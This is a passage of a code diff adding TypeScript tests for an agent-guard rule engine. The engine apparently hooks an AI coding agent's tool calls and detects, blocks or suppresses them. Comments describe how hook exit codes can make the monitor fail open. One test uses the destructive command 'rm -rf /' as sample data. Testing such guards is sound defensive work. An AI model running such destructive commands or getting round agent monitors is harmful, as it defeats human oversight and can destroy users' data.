+description: "Fixture rule for the scan lane tests."
+author: "ATR Community"
+date: "2026/08/14"
+schema_version: "0.1"
+maturity: test
+severity: critical
+tags:
+  category: excessive-autonomy
+  subcategory: fixture
+  scan_target: both
+  confidence: high
+agent_source:
+  type: tool_call
+  framework: [any]
+  provider: [any]
+detection:
+  method: pattern
+  condition: any
+  conditions:
+    - field: content
+      operator: regex
+      value: "${MARKER}"
+      description: "fixture"
+response:
+  actions: [alert]
+  message_template: "fixture"
+test_cases:
+  true_positives:
+    - input: "${MARKER}"
+      expected: triggered
+  true_negatives:
+    - input: "nothing to see"
+      expected: not_triggered
+`;
+
+  function runScan(
+    args: readonly string[],
+    env: Record<string, string> = {}
+  ): { status: number; json: Record<string, unknown> | null; stdout: string; stderr: string } {
+    const dir = mkdtempSync(join(tmpdir(), 'atr-scan-lane-'));
     try {
-      expect(resolveLaneOrWarn(undefined, { ATR_LANE: 'enfroce' })).toBe('hunt');
-    } finally {
-      (process.stderr as { write: unknown }).write = write;
-    }
-    expect(seen.join('')).toContain('enfroce');
-  });
+      const rulesDir = join(dir, 'rules', 'excessive-autonomy');
+      mkdirSync(rulesDir, { recursive: true });
+      writeFileSync(join(rulesDir, `${RULE_ID}-fixture.yaml`), RULE_YAML);
 
-  it('an unparseable ATR_BLOCKING warns and falls back to off', () => {
-    const seen: string[] = [];
-    const write = process.stderr.write;
-    (process.stderr as { write: unknown }).write = (chunk: string) => {
-      seen.push(String(chunk));
-      return true;
-    };
-    try {
-      expect(resolveBlockingOrWarn(undefined, { ATR_BLOCKING: 'enabled' })).toBe(false);
-    } finally {
-      (process.stderr as { write: unknown }).write = write;
-    }
-    // The operator asked for enforcement and is not getting it. Say so.
-    expect(seen.join('')).toContain('NOT enabled');
-  });
+      const eventsPath = join(dir, 'events.json');
+      writeFileSync(
+        eventsPath,
+        JSON.stringify([
+          { type: 'tool_call', timestamp: '2026-08-14T00:00:00Z', content: MARKER },
+        ])
+      );
 
-  it('an explicit bad argument still throws -- that is the caller, not the shell', () => {
-    expect(() => resolveLaneOrWarn('enfroce')).toThrow(TypeError);
-  });
-
-  it('constructing an engine under a typo\'d ATR_LANE does not throw', () => {
-    expect(() => new ATREngine({ rulesDir: 'rules' })).not.toThrow();
-  });
-
-  it('the warning is emitted once per distinct value, not per call', () => {
-    let calls = 0;
-    const write = process.stderr.write;
-    (process.stderr as { write: unknown }).write = () => {
-      calls += 1;
-      return true;
-    };
-    try {
-      for (let i = 0; i < 5; i += 1) {
-        resolveBlockingOrWarn(undefined, { ATR_BLOCKING: 'enabled' });
+      const r = spawnSync(
+        'npx',
+        ['tsx', CLI, 'scan', eventsPath, '--rules', join(dir, 'rules'), '--json',
+         '--no-report', ...args],
+        { encoding: 'utf8', timeout: 120_000, env: { ...process.env, ...env } }
+      );
+      const stdout = r.stdout ?? '';
+      const start = stdout.indexOf('{');
+      let json: Record<string, unknown> | null = null;
+      if (start !== -1) {
+        try {
+          json = JSON.parse(stdout.slice(start)) as Record<string, unknown>;
+        } catch {
+          json = null;
+        }
       }
+      return { status: r.status ?? -1, json, stdout, stderr: r.stderr ?? '' };
     } finally {
-      (process.stderr as { write: unknown }).write = write;
+      rmSync(dir, { recursive: true, force: true });
     }
-    expect(calls).toBe(1);
+  }
+
+  /** Rule ids anywhere in the scan's JSON output. */
+  const firedRules = (json: Record<string, unknown> | null): string[] =>
+    [...JSON.stringify(json ?? {}).matchAll(/ATR-\d{4}-\d{5}/g)].map((m) => m[0]!);
+
+  it('fires a maturity=test rule in the default lane', () => {
+    const { status, json, stderr } = runScan([]);
+    expect(status, stderr).toBe(0);
+    // CONTROL for every "did not fire" assertion below: the fixture, the events
+    // file and the JSON shape all work, so an empty result later is the lane.
+    expect(firedRules(json)).toContain(RULE_ID);
+  });
+
+  it('--lane enforce keeps it from firing; --lane hunt lets it fire', () => {
+    expect(firedRules(runScan(['--lane', 'enforce']).json)).not.toContain(RULE_ID);
+    expect(firedRules(runScan(['--lane', 'alert']).json)).toContain(RULE_ID);
+    expect(firedRules(runScan(['--lane', 'hunt']).json)).toContain(RULE_ID);
+  });
+
+  it('reads ATR_LANE, and --lane overrides it', () => {
+    // The engine no longer reads ATR_LANE, so this passes only because the CLI
+    // resolves it and hands the result to ATREngine explicitly.
+    expect(firedRules(runScan([], { ATR_LANE: 'enforce' }).json)).not.toContain(RULE_ID);
+    expect(
+      firedRules(runScan(['--lane', 'hunt'], { ATR_LANE: 'enforce' }).json)
+    ).toContain(RULE_ID);
+  });
+
+  it('accepts ATR_LANE=ENFORCE, which used to fall back to hunt in silence', () => {
+    expect(firedRules(runScan([], { ATR_LANE: 'ENFORCE' }).json)).not.toContain(RULE_ID);
+  });
+
+  it('exits 1 on a misspelled --lane instead of quietly scanning in hunt', () => {
+    const { status, stderr } = runScan(['--lane', 'enfroce']);
+    expect(status).toBe(1);
+    expect(stderr).toContain('Invalid --lane');
+  });
+
+  it('warns but still scans when ATR_LANE is misspelled', () => {
+    const { status, json, stderr } = runScan([], { ATR_LANE: 'enfroce' });
+    expect(status, stderr).toBe(0);
+    expect(stderr).toContain('ATR_LANE');
+    expect(firedRules(json)).toContain(RULE_ID);
+  });
+});
+
+describe('action.yml lane input', () => {
+  // The composite action cannot be executed here, so this reads the shipped
+  // action.yml and (a) executes its validation fragment for real under sh,
+  // (b) checks the input is actually threaded into the `atr scan` invocation.
+  // Without this, deleting the `lane:` input left 1027 tests green.
+  const actionYml = readFileSync(
+    new URL('../action.yml', import.meta.url).pathname,
+    'utf8'
+  );
+
+  it('declares a lane input whose default is a real lane', () => {
+    expect(actionYml).toMatch(/^\s{2}lane:/m);
+    const defaultLane = /^\s{2}lane:[\s\S]*?default:\s*'([^']+)'/m.exec(actionYml)?.[1];
+    expect(defaultLane).toBe(DEFAULT_LANE);
+    expect(parseLane(defaultLane!)).toBe(DEFAULT_LANE);
+  });
+
+  it('threads the input into the environment and on to `atr scan --lane`', () => {
+    expect(actionYml).toContain('ATR_SCAN_LANE: ${{ inputs.lane }}');
+    expect(actionYml).toMatch(/--lane "\$ATR_SCAN_LANE"/);
+  });
+
+  it('its validation fragment accepts every lane and rejects a typo', () => {
+    // Extract the real `case` statement and run it, rather than trusting that a
+    // string containing "enforce|alert|hunt" behaves like one.
+    const fragment = /case "\$ATR_SCAN_LANE" in[\s\S]*?esac/.exec(actionYml)?.[0];
+    expect(fragment).toBeDefined();
+
+    const run = (value: string) =>
+      spawnSync('sh', ['-c', `ATR_SCAN_LANE='${value}'\n${fragment}`], {
+        encoding: 'utf8',
+        timeout: 30_000,
+      });
+
+    for (const lane of ['enforce', 'alert', 'hunt']) {
+      expect(run(lane).status, `lane ${lane} should be accepted`).toBe(0);
+    }
+    const bad = run('enfroce');
+    expect(bad.status).toBe(1);
+    expect(bad.stdout + bad.stderr).toContain('Invalid lane');
+  });
+});
+
+describe('a typo in the environment degrades the CLI, it does not kill it', () => {
+  // WHY DEGRADE RATHER THAN EXIT — measured, not reasoned.
+  //
+  // `atr init` installs `atr guard` as a Claude Code PreToolUse *command* hook.
+  // In the Claude Code 2.1.76 hook dispatcher, a command hook's exit status is
+  // mapped: 0 -> hook_success (renderer returns null), 2 -> hook_blocking_error
+  // (stderr shown AND the tool blocked), anything else -> hook_non_blocking_error,
+  // where the tool RUNS, the attachment maps to [] for the model, and the
+  // renderer prints exactly "<hookName> hook error" without the stderr text.
+  //
+  // So exiting non-zero over a typo loses every detection for that call, lets
+  // the tool run anyway, and tells the operator nothing. The only loud status
+  // is 2, which blocks the tool outright — a stray shell variable must not do
+  // that. Degrading keeps detection and reports the problem where a human
+  // running the command can see it.
+  //
+  // The cost, stated: an operator can believe enforcement is on when it is not.
+  // That is why every note must be printed, and why the degraded posture is
+  // advisory — the failure mode is "ATR does not act", never "ATR acts wrongly".
+
+  it('an unparseable ATR_LANE falls back to hunt and says so', () => {
+    const policy = resolveEnforcementPolicy({}, { ATR_LANE: 'enfroce' });
+    expect(policy.lane).toBe('hunt');
+    expect(policy.notes.join(' ')).toContain('enfroce');
+    expect(policy.notes.join(' ')).toContain('ATR_LANE');
+  });
+
+  it('an unparseable ATR_BLOCKING falls back to off and says it is NOT enabled', () => {
+    const policy = resolveEnforcementPolicy({}, { ATR_BLOCKING: 'enabled' });
+    expect(policy.blocking).toBe(false);
+    // The operator asked for enforcement and is not getting it. Say so.
+    expect(policy.notes.join(' ')).toContain('NOT enabled');
+  });
+
+  // The fallback lane is the WIDEST one. Blocking on it would enforce using
+  // maturities the operator never chose — the fallback direction landing on the
+  // dangerous side, which is the whole reason this rule exists.
+  it('an unreadable lane forces blocking off, even against an explicit --blocking', () => {
+    const viaEnv = resolveEnforcementPolicy({}, { ATR_LANE: 'enfroce', ATR_BLOCKING: '1' });
+    expect(viaEnv.lane).toBe('hunt');
+    expect(viaEnv.blocking).toBe(false);
+    expect(viaEnv.notes.join(' ')).toContain('Blocking disabled');
+
+    const viaFlag = resolveEnforcementPolicy({ blocking: true }, { ATR_LANE: 'enfroce' });
+    expect(viaFlag.blocking).toBe(false);
+    expect(viaFlag.notes.join(' ')).toContain('Blocking disabled');
+
+    // CONTROL: with a READABLE lane the same explicit flag is honoured, so the
+    // clause above is the lane failure talking and not a blanket override.
+    const clean = resolveEnforcementPolicy({ blocking: true }, { ATR_LANE: 'enforce' });
+    expect(clean.blocking).toBe(true);
+    expect(clean.lane).toBe('enforce');
+    expect(clean.notes).toEqual([]);
+  });
+
+  it('a bad FLAG still throws — that is the caller, not the shell', () => {
+    expect(() => resolveEnforcementPolicy({ lane: 'enfroce' as never }, {})).toThrow(TypeError);
+    expect(() =>
+      resolveEnforcementPolicy({ blocking: 'false' as unknown as boolean }, {})
+    ).toThrow(TypeError);
+  });
+
+  it('a clean environment produces no notes at all', () => {
+    const policy = resolveEnforcementPolicy({}, {});
+    expect(policy).toMatchObject({ lane: DEFAULT_LANE, blocking: DEFAULT_BLOCKING });
+    expect(policy.notes).toEqual([]);
+  });
+
+  // Replaces a test that claimed to construct an engine "under a typo'd
+  // ATR_LANE" while never setting ATR_LANE — the file-level beforeEach had just
+  // deleted it, so the premise in the name was never established and the test
+  // passed whatever the constructor did. The engine no longer reads the
+  // environment at all, so the honest version asserts exactly that: a typo'd
+  // value is present, and it changes nothing.
+  it('a typo in ATR_LANE cannot reach the engine constructor at all', async () => {
+    process.env['ATR_LANE'] = 'enfroce';
+    expect(process.env['ATR_LANE']).toBe('enfroce');
+    expect(parseLane(process.env['ATR_LANE']!)).toBeNull(); // genuinely invalid
+
+    const engine = new ATREngine({ rules: [fixtureRule()] });
+    await engine.loadRules();
+    expect(engine.getLane()).toBe('hunt');
+    // Non-trivial: the engine is live and detecting, not merely "did not throw".
+    expect(engine.evaluate(markerEvent()).length).toBeGreaterThan(0);
   });
 });

--- a/tests/enforcement.test.ts
+++ b/tests/enforcement.test.ts
@@ -1,0 +1,649 @@
+/**
+ * Enforcement policy: blocking is opt-in, and the lane finally has an entrance.
+ *
+ * WHAT THIS PINS
+ *
+ * 1. Blocking off (the default) must OMIT permissionDecision, never downgrade it
+ *    to "allow". In the Claude Code PreToolUse contract "allow" is affirmative
+ *    approval — it suppresses the host's own permission prompt — so a guard that
+ *    answered "allow" where it used to answer "ask" would make the host LESS
+ *    safe than having no hook at all.
+ *
+ * 2. Blocking off must also stop the second channel. Before this, a benign
+ *    `Bash{command:"ls -la"}` produced permissionDecision "allow" while the
+ *    ActionExecutor really invoked blockTool on the adapter: the hook said yes
+ *    and the action channel said no, on the same event. Observation actions
+ *    (alert / snapshot / shadow / escalate) must keep running — suppressing them
+ *    would cost detection.
+ *
+ * 3. Blocking on must reproduce the historical severity+confidence matrix
+ *    exactly, so turning the switch on is not a second behaviour to review.
+ *
+ * 4. Detection is never affected by either switch. Same matches, same count,
+ *    same severity, in both modes.
+ *
+ * The destructive/observational split is NOT redefined here: these tests read
+ * the same blast-radius ladder the eligibility gate uses
+ * (src/quality/action-eligibility.ts), so a new adapter method cannot land on
+ * the wrong side of the switch without that module classifying it first.
+ */
+
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest';
+import { spawnSync } from 'node:child_process';
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import {
+  DEFAULT_BLOCKING,
+  DEFAULT_LANE,
+  isEnforcementAction,
+  parseBooleanFlag,
+  parseLane,
+  resolveBlocking,
+  resolveLane,
+} from '../src/enforcement.js';
+import { ATREngine } from '../src/engine.js';
+import { ActionExecutor } from '../src/action-executor.js';
+import {
+  HookHandler,
+  toClaudeCodePreToolUse,
+  toClaudeCodePostToolUse,
+} from '../src/hook-handler.js';
+import { TIERED_ACTIONS, actionTier, ACTION_TIERS } from '../src/quality/action-eligibility.js';
+import type {
+  ActionResult,
+  AgentEvent,
+  ATRRule,
+  ExecutionContext,
+  HookInput,
+  HookOutput,
+  PlatformAdapter,
+} from '../src/types.js';
+
+const CLI = new URL('../src/cli.ts', import.meta.url).pathname;
+
+// --- helpers ---------------------------------------------------------------
+
+/** Records which PlatformAdapter methods were actually invoked, by name. */
+class RecordingAdapter implements PlatformAdapter {
+  readonly name = 'recording';
+  calls: string[] = [];
+
+  private record(method: string, action: string): ActionResult {
+    this.calls.push(method);
+    return Object.freeze({
+      action: action as ActionResult['action'],
+      success: true,
+      message: `recorded ${method}`,
+      timestamp: new Date().toISOString(),
+    });
+  }
+  async blockInput() { return this.record('blockInput', 'block_input'); }
+  async blockOutput() { return this.record('blockOutput', 'block_output'); }
+  async blockTool() { return this.record('blockTool', 'block_tool'); }
+  async quarantineSession() { return this.record('quarantineSession', 'quarantine_session'); }
+  async resetContext() { return this.record('resetContext', 'reset_context'); }
+  async alert() { return this.record('alert', 'alert'); }
+  async shadow() { return this.record('shadow', 'shadow'); }
+  async snapshot() { return this.record('snapshot', 'snapshot'); }
+  async escalate() { return this.record('escalate', 'escalate'); }
+  async reducePermissions() { return this.record('reducePermissions', 'reduce_permissions'); }
+  async killAgent() { return this.record('killAgent', 'kill_agent'); }
+}
+
+const MARKER = 'enforcement_fixture_marker';
+
+/** A critical rule that declares one destructive and two observational actions. */
+function fixtureRule(overrides: Partial<ATRRule> = {}): ATRRule {
+  return {
+    title: 'Enforcement fixture',
+    id: 'ATR-2026-09101',
+    status: 'experimental',
+    description: 'Fixture rule for enforcement tests.',
+    author: 'ATR Community',
+    date: '2026/08/14',
+    schema_version: '0.1',
+    maturity: 'test',
+    severity: 'critical',
+    tags: {
+      category: 'excessive-autonomy',
+      subcategory: 'fixture',
+      scan_target: 'both',
+      confidence: 'high',
+    },
+    agent_source: { type: 'tool_call', framework: ['any'], provider: ['any'] },
+    detection: {
+      method: 'pattern',
+      condition: 'any',
+      conditions: [
+        { field: 'content', operator: 'regex', value: MARKER, description: 'fixture' },
+      ],
+    },
+    response: {
+      actions: ['block_tool', 'alert', 'snapshot'],
+      message_template: 'fixture',
+    },
+    ...overrides,
+  } as unknown as ATRRule;
+}
+
+function markerEvent(): AgentEvent {
+  return Object.freeze({
+    type: 'tool_call',
+    timestamp: new Date().toISOString(),
+    content: MARKER,
+    fields: Object.freeze({ tool_name: 'Read', tool_args: '{}', content: MARKER }),
+  }) as AgentEvent;
+}
+
+async function loadedEngine(config: Record<string, unknown> = {}): Promise<ATREngine> {
+  const engine = new ATREngine({ rules: [fixtureRule()], ...config });
+  const count = await engine.loadRules();
+  // CONTROL: the constructor does not compile patterns. Without loadRules() the
+  // engine matches nothing and every assertion below would pass vacuously.
+  expect(count).toBeGreaterThan(0);
+  return engine;
+}
+
+const hookOutput = (o: Partial<HookOutput>): HookOutput =>
+  Object.freeze({ decision: 'allow', reason: 'r', ...o }) as HookOutput;
+
+/** Restore process.env between tests — these tests set ATR_* deliberately. */
+let savedEnv: NodeJS.ProcessEnv;
+beforeEach(() => {
+  savedEnv = { ...process.env };
+  delete process.env['ATR_LANE'];
+  delete process.env['ATR_BLOCKING'];
+});
+afterEach(() => {
+  process.env = savedEnv;
+});
+
+// --- 1. policy resolution --------------------------------------------------
+
+describe('enforcement policy resolution', () => {
+  it('defaults to advisory hunt when nothing is configured', () => {
+    expect(DEFAULT_LANE).toBe('hunt');
+    expect(DEFAULT_BLOCKING).toBe(false);
+    expect(resolveLane(undefined, {})).toBe('hunt');
+    expect(resolveBlocking(undefined, {})).toBe(false);
+  });
+
+  it('reads the lane from the environment', () => {
+    expect(resolveLane(undefined, { ATR_LANE: 'enforce' })).toBe('enforce');
+    expect(resolveLane(undefined, { ATR_LANE: 'alert' })).toBe('alert');
+    expect(resolveLane(undefined, { ATR_LANE: '  hunt ' })).toBe('hunt');
+  });
+
+  it('lets explicit config beat the environment, in both directions', () => {
+    expect(resolveLane('enforce', { ATR_LANE: 'hunt' })).toBe('enforce');
+    expect(resolveLane('hunt', { ATR_LANE: 'enforce' })).toBe('hunt');
+    expect(resolveBlocking(true, { ATR_BLOCKING: '0' })).toBe(true);
+    expect(resolveBlocking(false, { ATR_BLOCKING: '1' })).toBe(false);
+  });
+
+  it('treats an empty environment value as unset', () => {
+    expect(resolveLane(undefined, { ATR_LANE: '' })).toBe('hunt');
+    expect(resolveBlocking(undefined, { ATR_BLOCKING: '   ' })).toBe(false);
+  });
+
+  it('accepts the documented truthy/falsy spellings for blocking', () => {
+    for (const v of ['1', 'true', 'TRUE', 'yes', 'on']) {
+      expect(resolveBlocking(undefined, { ATR_BLOCKING: v })).toBe(true);
+    }
+    for (const v of ['0', 'false', 'no', 'off']) {
+      expect(resolveBlocking(undefined, { ATR_BLOCKING: v })).toBe(false);
+    }
+  });
+
+  it('throws on an unrecognised value instead of silently falling back', () => {
+    // A silent fallback is the worst failure mode here: the operator believes
+    // they configured enforcement and they did not.
+    expect(() => resolveLane('enfroce')).toThrow(/Invalid lane/);
+    expect(() => resolveLane(undefined, { ATR_LANE: 'block' })).toThrow(/ATR_LANE/);
+    expect(() => resolveBlocking(undefined, { ATR_BLOCKING: 'enabled' })).toThrow(/ATR_BLOCKING/);
+    expect(parseLane('nope')).toBeNull();
+    expect(parseBooleanFlag('maybe')).toBeNull();
+  });
+
+  it('derives the enforce/observe split from the blast-radius ladder', () => {
+    for (const action of TIERED_ACTIONS) {
+      expect(isEnforcementAction(action)).toBe(actionTier(action) > ACTION_TIERS.OBSERVE);
+    }
+    expect(isEnforcementAction('alert')).toBe(false);
+    expect(isEnforcementAction('snapshot')).toBe(false);
+    expect(isEnforcementAction('escalate')).toBe(false);
+    expect(isEnforcementAction('shadow')).toBe(false);
+    expect(isEnforcementAction('block_tool')).toBe(true);
+    expect(isEnforcementAction('kill_agent')).toBe(true);
+    expect(isEnforcementAction('quarantine_session')).toBe(true);
+    expect(isEnforcementAction('reduce_permissions')).toBe(true);
+  });
+});
+
+// --- 2. lane entry points --------------------------------------------------
+
+describe('lane has a real entrance', () => {
+  it('is hunt by default', async () => {
+    const engine = await loadedEngine();
+    expect(engine.getLane()).toBe('hunt');
+  });
+
+  it('takes the lane from programmatic config', async () => {
+    const engine = await loadedEngine({ lane: 'enforce' });
+    expect(engine.getLane()).toBe('enforce');
+  });
+
+  it('takes the lane from ATR_LANE when config is silent', async () => {
+    process.env['ATR_LANE'] = 'alert';
+    const engine = await loadedEngine();
+    expect(engine.getLane()).toBe('alert');
+  });
+
+  it('prefers explicit config over ATR_LANE', async () => {
+    process.env['ATR_LANE'] = 'hunt';
+    const engine = await loadedEngine({ lane: 'enforce' });
+    expect(engine.getLane()).toBe('enforce');
+  });
+
+  it('rejects an invalid ATR_LANE at construction, before any evaluation', () => {
+    process.env['ATR_LANE'] = 'enfroce';
+    expect(() => new ATREngine({ rules: [fixtureRule()] })).toThrow(/ATR_LANE/);
+  });
+
+  it('actually gates firing: a maturity=test rule fires in hunt, not in enforce', async () => {
+    const hunt = await loadedEngine();
+    expect(hunt.evaluate(markerEvent()).length).toBeGreaterThan(0);
+
+    process.env['ATR_LANE'] = 'enforce';
+    const enforce = await loadedEngine();
+    expect(enforce.getLane()).toBe('enforce');
+    expect(enforce.evaluate(markerEvent())).toHaveLength(0);
+  });
+});
+
+// --- 3. channel A: the Claude Code contract --------------------------------
+
+describe('hook contract omits the decision when blocking is off', () => {
+  it('emits NO permissionDecision by default, for every outcome', () => {
+    for (const decision of ['allow', 'ask', 'deny'] as const) {
+      const p = toClaudeCodePreToolUse(hookOutput({ decision, reason: `r-${decision}` }));
+      const hso = p['hookSpecificOutput'] as Record<string, unknown>;
+      expect(hso['hookEventName']).toBe('PreToolUse');
+      expect('permissionDecision' in hso).toBe(false);
+      expect(hso['permissionDecision']).toBeUndefined();
+    }
+  });
+
+  it('never downgrades a block to "allow" — the field is absent, not neutral', () => {
+    const p = toClaudeCodePreToolUse(hookOutput({ decision: 'deny', reason: 'rm -rf /' }));
+    const serialized = JSON.stringify(p);
+    expect(serialized).not.toContain('permissionDecision');
+    // An `ask` must not become an `allow` either: that is the exact regression
+    // that made `rm -rf /` stop prompting the user in an earlier attempt.
+    const asked = toClaudeCodePreToolUse(hookOutput({ decision: 'ask' }));
+    expect(JSON.stringify(asked)).not.toContain('"allow"');
+  });
+
+  it('still reports the detection while advisory', () => {
+    const p = toClaudeCodePreToolUse(
+      hookOutput({
+        decision: 'deny',
+        reason: 'DENY: something [critical/93% confidence] (2 rules matched)',
+        matched_rules: Object.freeze(['ATR-2026-00062', 'ATR-2026-00040']),
+      })
+    );
+    expect(p['atr_advisory']).toBe(true);
+    expect(p['atr_decision']).toBe('deny');
+    expect(p['atr_reason']).toContain('critical/93%');
+    expect(p['matched_rules']).toEqual(['ATR-2026-00062', 'ATR-2026-00040']);
+  });
+
+  it('emits the 1:1 permissionDecision once blocking is on', () => {
+    for (const decision of ['allow', 'ask', 'deny'] as const) {
+      const p = toClaudeCodePreToolUse(
+        hookOutput({ decision, reason: `r-${decision}` }),
+        { blocking: true }
+      );
+      const hso = p['hookSpecificOutput'] as Record<string, unknown>;
+      expect(hso['permissionDecision']).toBe(decision);
+      expect(hso['permissionDecisionReason']).toBe(`r-${decision}`);
+      expect(p['atr_advisory']).toBeUndefined();
+    }
+  });
+
+  it('PostToolUse: no block sentinel while advisory, block once enabled', () => {
+    for (const decision of ['deny', 'ask'] as const) {
+      const advisory = toClaudeCodePostToolUse(hookOutput({ decision }));
+      expect(advisory['decision']).toBeUndefined();
+      expect(advisory['atr_advisory']).toBe(true);
+      expect(advisory['atr_decision']).toBe(decision);
+
+      const blocking = toClaudeCodePostToolUse(hookOutput({ decision }), { blocking: true });
+      expect(blocking['decision']).toBe('block');
+    }
+    expect(
+      toClaudeCodePostToolUse(hookOutput({ decision: 'allow' }), { blocking: true })['decision']
+    ).toBeUndefined();
+  });
+});
+
+// --- 4. channel B: response actions ----------------------------------------
+
+describe('response actions obey the same switch', () => {
+  it('suppresses enforcement actions and keeps observation ones (real engine path)', async () => {
+    const engine = await loadedEngine();
+    const adapter = new RecordingAdapter();
+    const executor = new ActionExecutor({ adapter });
+    expect(executor.isBlocking()).toBe(false);
+
+    const { verdict } = await engine.evaluateWithVerdict(markerEvent(), executor);
+
+    // Detection is untouched: the rule matched and still DECLARES block_tool.
+    expect(verdict.matchCount).toBeGreaterThan(0);
+    expect(verdict.actions).toContain('block_tool');
+
+    // But the adapter was never asked to block. CONTROL: alert/snapshot prove
+    // the executor really reached the adapter, so "no blockTool" means
+    // suppressed, not "never got there".
+    expect(adapter.calls).toContain('alert');
+    expect(adapter.calls).toContain('snapshot');
+    expect(adapter.calls).not.toContain('blockTool');
+  });
+
+  it('dispatches them once blocking is on', async () => {
+    const engine = await loadedEngine();
+    const adapter = new RecordingAdapter();
+    const executor = new ActionExecutor({ adapter, blocking: true });
+    expect(executor.isBlocking()).toBe(true);
+
+    await engine.evaluateWithVerdict(markerEvent(), executor);
+
+    expect(adapter.calls).toContain('blockTool');
+    expect(adapter.calls).toContain('alert');
+    expect(adapter.calls).toContain('snapshot');
+  });
+
+  it('honours ATR_BLOCKING when no explicit flag is passed', async () => {
+    process.env['ATR_BLOCKING'] = '1';
+    const engine = await loadedEngine();
+    const adapter = new RecordingAdapter();
+    await engine.evaluateWithVerdict(markerEvent(), new ActionExecutor({ adapter }));
+    expect(adapter.calls).toContain('blockTool');
+  });
+
+  it('lets an explicit false beat ATR_BLOCKING', async () => {
+    process.env['ATR_BLOCKING'] = '1';
+    const engine = await loadedEngine();
+    const adapter = new RecordingAdapter();
+    await engine.evaluateWithVerdict(
+      markerEvent(),
+      new ActionExecutor({ adapter, blocking: false })
+    );
+    expect(adapter.calls).not.toContain('blockTool');
+    expect(adapter.calls).toContain('alert');
+  });
+
+  it('reports every suppressed action instead of dropping it silently', async () => {
+    const adapter = new RecordingAdapter();
+    const executor = new ActionExecutor({ adapter });
+    const context = {
+      event: markerEvent(),
+      matches: [],
+      verdict: {
+        outcome: 'deny',
+        reason: 'x',
+        matchCount: 1,
+        highestSeverity: 'critical',
+        highestConfidence: 0.9,
+        actions: Object.freeze(['kill_agent', 'block_input', 'alert'] as const),
+        matches: Object.freeze([]),
+        timestamp: new Date().toISOString(),
+      },
+    } as unknown as ExecutionContext;
+
+    const results = await executor.execute(context);
+    const byAction = new Map(results.map((r) => [r.action, r]));
+
+    expect(byAction.get('kill_agent')!.message).toMatch(/Suppressed kill_agent \(tier terminate\)/);
+    expect(byAction.get('block_input')!.message).toMatch(/Suppressed block_input \(tier interrupt\)/);
+    expect(byAction.get('alert')!.message).toBe('recorded alert');
+    expect(adapter.calls).toEqual(['alert']);
+  });
+
+  it('suppression wins over dry-run: "would execute" is false for a forbidden action', async () => {
+    const adapter = new RecordingAdapter();
+    const executor = new ActionExecutor({ adapter, dryRun: true });
+    const context = {
+      event: markerEvent(),
+      matches: [],
+      verdict: {
+        outcome: 'deny',
+        reason: 'x',
+        matchCount: 1,
+        highestSeverity: 'critical',
+        highestConfidence: 0.9,
+        actions: Object.freeze(['block_tool', 'alert'] as const),
+        matches: Object.freeze([]),
+        timestamp: new Date().toISOString(),
+      },
+    } as unknown as ExecutionContext;
+
+    const results = await executor.execute(context);
+    const blockTool = results.find((r) => r.action === 'block_tool')!;
+    expect(blockTool.message).toContain('[advisory]');
+    expect(blockTool.message).not.toContain('[dry-run]');
+  });
+});
+
+// --- 5. handler wiring -----------------------------------------------------
+
+describe('HookHandler carries the policy', () => {
+  it('is advisory by default and keeps the verdict intact', async () => {
+    const engine = await loadedEngine();
+    const adapter = new RecordingAdapter();
+    const handler = new HookHandler({
+      engine,
+      executor: new ActionExecutor({ adapter }),
+    });
+
+    expect(handler.isBlocking()).toBe(false);
+
+    const out = await handler.handlePreToolUse({
+      hook: 'PreToolUse',
+      tool_name: 'Read',
+      tool_input: { content: MARKER },
+    } as HookInput);
+
+    // The internal ATR verdict is unchanged — advisory mode changes what is
+    // EMITTED to the host, not what ATR concluded.
+    expect(out.decision).toBe('deny');
+    expect(out.matched_rules).toContain('ATR-2026-09101');
+
+    const payload = toClaudeCodePreToolUse(out, { blocking: handler.isBlocking() });
+    expect((payload['hookSpecificOutput'] as Record<string, unknown>)['permissionDecision'])
+      .toBeUndefined();
+  });
+
+  it('picks blocking up from ATR_BLOCKING', async () => {
+    process.env['ATR_BLOCKING'] = 'true';
+    const engine = await loadedEngine();
+    const handler = new HookHandler({
+      engine,
+      executor: new ActionExecutor({ adapter: new RecordingAdapter() }),
+    });
+    expect(handler.isBlocking()).toBe(true);
+  });
+
+  it('a fail-closed guard error still emits no permissionDecision while advisory', async () => {
+    const brokenEngine = {
+      evaluateWithVerdict: vi.fn(async () => {
+        throw new Error('engine crashed');
+      }),
+    } as unknown as ATREngine;
+    const handler = new HookHandler({
+      engine: brokenEngine,
+      executor: new ActionExecutor({ adapter: new RecordingAdapter() }),
+      failOpen: false,
+    });
+
+    const stderrSpy = vi.spyOn(process.stderr, 'write').mockReturnValue(true);
+    const out = await handler.handlePreToolUse({
+      hook: 'PreToolUse',
+      tool_name: 'Read',
+      tool_input: {},
+    } as HookInput);
+    stderrSpy.mockRestore();
+
+    // fail-closed still produces a deny internally...
+    expect(out.decision).toBe('deny');
+    // ...and advisory mode still refuses to vote on permission. "Do not block"
+    // means do not block, including when the guard itself is broken.
+    const payload = toClaudeCodePreToolUse(out, { blocking: handler.isBlocking() });
+    expect(JSON.stringify(payload)).not.toContain('permissionDecision');
+  });
+});
+
+// --- 6. CLI: the shipping surface ------------------------------------------
+
+describe('atr guard CLI', () => {
+  const RULE_YAML = `title: "Enforcement CLI fixture"
+id: ATR-2026-09102
+rule_version: 1
+status: experimental
+description: "Fixture rule for the enforcement CLI tests."
+author: "ATR Community"
+date: "2026/08/14"
+schema_version: "0.1"
+maturity: test
+severity: critical
+tags:
+  category: excessive-autonomy
+  subcategory: fixture
+  scan_target: both
+  confidence: high
+agent_source:
+  type: tool_call
+  framework: [any]
+  provider: [any]
+detection:
+  method: pattern
+  condition: any
+  conditions:
+    - field: content
+      operator: regex
+      value: "${MARKER}"
+      description: "fixture"
+response:
+  actions: [block_tool, alert]
+  message_template: "fixture"
+test_cases:
+  true_positives:
+    - input: "${MARKER}"
+      expected: triggered
+  true_negatives:
+    - input: "nothing to see"
+      expected: not_triggered
+`;
+
+  function runGuard(
+    args: readonly string[],
+    env: Record<string, string> = {}
+  ): { status: number; lines: Array<Record<string, unknown>>; stderr: string } {
+    const dir = mkdtempSync(join(tmpdir(), 'atr-enforcement-'));
+    try {
+      const rulesDir = join(dir, 'rules', 'excessive-autonomy');
+      mkdirSync(rulesDir, { recursive: true });
+      writeFileSync(join(rulesDir, 'ATR-2026-09102-fixture.yaml'), RULE_YAML);
+
+      const r = spawnSync(
+        'npx',
